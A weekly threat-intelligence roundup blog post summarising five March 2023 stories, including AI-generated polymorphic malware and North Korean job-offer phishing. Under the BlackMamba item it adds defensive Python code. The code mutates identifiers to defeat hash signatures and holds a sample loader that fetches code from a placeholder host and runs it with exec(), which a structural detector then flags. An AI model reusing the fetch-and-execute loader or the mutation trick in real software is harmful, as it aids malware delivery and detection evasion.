Top five Cyber Threat Intel stories of the week: 03/06 to 03/10/2023

James Beal
Hunter Strategy
6 min read · Mar 10, 2023

Top 5 general threat intelligence stories of the week. Everything here comes from TLP:WHITE (now TLP:CLEAR under TLP 2.0) and open-source websites, so please feel free to share and enjoy reading about these events. Please reach out if you have any questions! Thank you!

General Worldwide activity:

1st: Palo Alto Survey Reveals 90% of Organizations Cannot Resolve Cyberthreats Within an Hour

Overview: Palo Alto Networks, the global cybersecurity leader, today published its 2023 State of Cloud-Native Security Report. The report surveyed more than 2,500 C-level executives around the world to better understand their cloud adoption strategies, and how those strategies work. With organizations of all sizes moving more of their operations to the cloud, a majority are struggling to automate cloud security and mitigate risks. It’s one reason why many companies are trying to improve security earlier in the development process, and looking for fewer vendors that can offer more security capabilities.

Breakdown: Cloud infrastructure, and the security needed to keep it safe, has been a massive focus for the last several years, driven by the large majority of companies pushing to move from traditional data center configurations to cloud only. A consideration often missing from that push is that the cloud is just another form of data center, with infrastructure that needs to be monitored and protected in the same way; the shared responsibility model moves the physical hosts and hypervisor off your plate, not the identities, network exposure, storage permissions, and logging you configure on top of them. Adoption of genuinely cloud-focused security toolsets has increased, but it still lags behind the attacks. This article shows the potential impacts, such as slow response time to attacks and a gap in awareness of which teams are responsible.

2nd: On Ukraine, China Prioritizes Its International Ambitions

Overview: Recently renewed allegations that China is considering providing lethal aid to Russia contrast starkly with Beijing’s calls for peace and continued assertions that it is “objective and just” regarding the war in Ukraine. Based on a review of China’s perspective on the war and what its leaders likely hope to achieve, Insikt Group judges that relations between China and the United States and Europe will almost certainly remain at odds for the duration of the war. Although China’s position suggests there are areas of potential collaboration on peace, Beijing is likely pursuing a strategy of using a peace settlement to shape how future international crises are addressed, which contains elements that are almost certainly unacceptable to the US and others.

Breakdown: The latest news from the Russia/Ukraine conflict is China's attempt to get involved from a peacekeeping perspective. This article summarizes the full report (linked in the article) from Insikt Group, Recorded Future's intelligence research division, which analyzes the current events. Geopolitics will always have a large impact on the online threat landscape as nations and nation-state groups get involved, so this is shared for awareness of current events.

3rd: BLACKMAMBA: USING AI TO GENERATE POLYMORPHIC MALWARE

Overview: The introduction of ChatGPT last year marked the first time neural network code synthesis was made freely available to the masses. This powerful and versatile tool can be used for everything from answering simple questions to instantly composing written works to developing original software programs, including malware — the latter of which introduces the potential for a dangerous new breed of cyber threats. Traditional security solutions like EDRs leverage multi-layer, data intelligence systems to combat some of today’s most sophisticated threats, and most automated controls claim to prevent novel or irregular behavior patterns, but in practice, this is very rarely the case. And with AI-generated, polymorphic malware becoming available to bad actors, the situation will only get worse.

Breakdown: The hype cycle around ChatGPT included a lot of chatter about the code-writing abilities of such a system and how they could be abused. Here we have a walk-through in which similar tactics are used to demonstrate that a comparable system can do exactly that: create malware. There is no reason to panic at this point; plenty of hand-written malware is already in circulation, and we are not yet at the point of being flooded by AI-generated attack code. It is a viable concern going forward, and this is a good demonstration of how programmers can use these tools to augment their abilities, for good and for bad. The practical caveat for defenders is that a payload regenerated on every run defeats hash and byte-signature matching, so detection has to key on behavior, starting with the static loader that fetches and executes the generated code, rather than on the payload bytes themselves.
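To make the "polymorphic payload vs. static loader" point concrete, here is an added example written for this roundup; it is not code from the BlackMamba write-up or from HYAS. It takes a small benign function (constructed here), produces functionally identical variants by renaming every parameter and local variable through Python's `ast` module, and shows that the SHA-256 fingerprints differ while the behavior does not. It then runs a simple structural check over a constructed loader snippet (parsed only, never executed; the URL is a placeholder) that flags `exec()`/`eval()` calls whose argument is built at runtime, which is the part of a runtime-codegen design that does stay constant.

```python
import ast
import hashlib
import random
import string

# Constructed benign sample: the "payload" whose behaviour must stay fixed
SAMPLE_SOURCE = '''
def collect(items):
    total = 0
    for item in items:
        total = total + item
    return total
'''

# Constructed loader snippet in the fetch-then-exec shape; it is only parsed,
# never executed, and example.invalid is a reserved placeholder domain.
LOADER_SOURCE = '''
import urllib.request
def run():
    generated = urllib.request.urlopen("https://example.invalid/codegen").read().decode()
    exec(generated)
'''


def _random_ident(rng, length=8):
    first = rng.choice(string.ascii_letters)
    rest = "".join(rng.choice(string.ascii_letters + string.digits) for _ in range(length - 1))
    return first + rest


class _Renamer(ast.NodeTransformer):
    """Rename function parameters and local variables to random identifiers.
    The function name itself is kept so the caller can still find the entry point."""

    def __init__(self, rng):
        self.rng = rng
        self.mapping = {}

    def visit_FunctionDef(self, node):
        # Collect every name bound inside this function: parameters and assignment targets
        for a in node.args.args:
            self.mapping.setdefault(a.arg, _random_ident(self.rng))
        for sub in ast.walk(node):
            if isinstance(sub, ast.Name) and isinstance(sub.ctx, ast.Store):
                self.mapping.setdefault(sub.id, _random_ident(self.rng))
        self.generic_visit(node)
        return node

    def visit_arg(self, node):
        node.arg = self.mapping.get(node.arg, node.arg)
        return node

    def visit_Name(self, node):
        node.id = self.mapping.get(node.id, node.id)
        return node


def mutate(source: str, seed: int) -> str:
    """Return a functionally equivalent variant of `source` with fresh identifiers."""
    tree = ast.parse(source)
    tree = _Renamer(random.Random(seed)).visit(tree)
    return ast.unparse(tree)


def fingerprint(source: str) -> str:
    """Hash-based 'signature' of the variant; changes with every rename."""
    return hashlib.sha256(source.encode()).hexdigest()


def run_collect(source: str, items):
    """Execute a variant in a scratch namespace and call its entry point."""
    ns = {}
    exec(compile(source, "<variant>", "exec"), ns)
    return ns["collect"](items)


def uses_dynamic_code_execution(source: str) -> bool:
    """Flag exec()/eval() calls whose argument is produced at runtime, not a literal.
    Hashing cannot catch a payload regenerated on every run, but the loader that
    fetches and executes it is static and can be matched structurally."""
    tree = ast.parse(source)
    for node in ast.walk(tree):
        if (isinstance(node, ast.Call) and isinstance(node.func, ast.Name)
                and node.func.id in ("exec", "eval")):
            if node.args and not isinstance(node.args[0], ast.Constant):
                return True
    return False


def demo():
    """Three variants: three distinct hashes, one behaviour."""
    variants = [mutate(SAMPLE_SOURCE, seed) for seed in range(3)]
    hashes = {fingerprint(v) for v in variants}
    results = {run_collect(v, [1, 2, 3]) for v in variants}
    return len(hashes), results


if __name__ == "__main__":
    print(demo())
    print(uses_dynamic_code_execution(LOADER_SOURCE), uses_dynamic_code_execution(SAMPLE_SOURCE))
```

Note that `run_collect` above would itself trip the structural check, which is the correct outcome: any component that compiles and executes code it did not ship with is the behavior to alert on, and an EDR rule keyed on that pattern (or on the network fetch that precedes it) survives renaming that a hash list does not.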

4th: 99% of Cybersecurity Leaders Are Stressed About Email Security

Overview: Egress, a cybersecurity company that provides intelligent email security, today released its Email Security Risk Report 2023. The report uncovers findings that demonstrate the prevalence of inbound and outbound email security incidents in Microsoft 365, with 92% of organizations falling victim to successful phishing attacks in the last 12 months, while 91% of organizations admit they have experienced email data loss. Not surprisingly, 99% of cybersecurity leaders confess to being stressed about email security. Specifically, 98% are frustrated with their Secure Email Gateway (SEG), with 53% conceding that too many phishing attacks bypass it.

Breakdown: Email continues to be a significant threat to all organizations and will be going forward, considering it is the primary communication method everyone uses. Phishing and ransomware sit at the top of the list of attacks year after year, so it is no surprise that almost everyone, including leadership in the information security space, has it as a top concern. The report's figures, with 92% of organizations falling victim to a phishing attack and 98% of leaders frustrated with their email gateway, show the massive influence email solutions have on the overall security risk posture of every organization.

5th: Security researchers targeted with new malware via job offers on LinkedIn

Overview: A suspected North Korean hacking group is targeting security researchers and media organizations in the U.S. and Europe with fake job offers that lead to the deployment of three new, custom malware families. The attackers use social engineering to convince their targets to engage over WhatsApp, where they drop the malware payload “PlankWalk,” a C++ backdoor that helps them establish a foothold in the target’s corporate environment. According to Mandiant, which has been tracking the particular campaign since June 2022, the observed activity overlaps with “Operation Dream Job,” attributed to the North Korean cluster known as the “Lazarus group.” However, Mandiant observed enough differences in the employed tools, infrastructure, and TTPs (tactics, techniques, and procedures) to attribute this campaign to a separate group they track as “UNC2970.” Furthermore, the attackers use previously unseen malware named ‘TOUCHMOVE’, ‘SIDESHOW’, and ‘TOUCHSHIFT,’ which have not been attributed to any known threat group. Mandiant says the particular group has previously targeted tech firms, media groups, and entities in the defense industry. Its latest campaign shows it has evolved its targeting scope and adapted its capabilities.

Breakdown: Tied in with the email issues above, we also continue to see nation-state-backed groups targeting high-risk groups with phishing and social engineering. Almost everyone involved in the day-to-day work of securing an organization is a high-risk employee, because the job requires elevated access to security toolsets and general IT infrastructure. That makes them perfect targets for APT groups looking for admin-level access into an organization. We have seen this kind of targeting many times in the past, and this is another reminder that similar attacks keep occurring and will continue to be a serious threat; a job offer that moves the conversation off LinkedIn to WhatsApp and then sends a file to run is the exact pattern described here.

Contact Us

contact@hunterstrategy.net

Our Website


James Beal
Hunter Strategy

Cyber Threat Intelligence Engineer - Focused on simplifying the evolving threat landscape and creating tangible alerts to help TRIAGE events.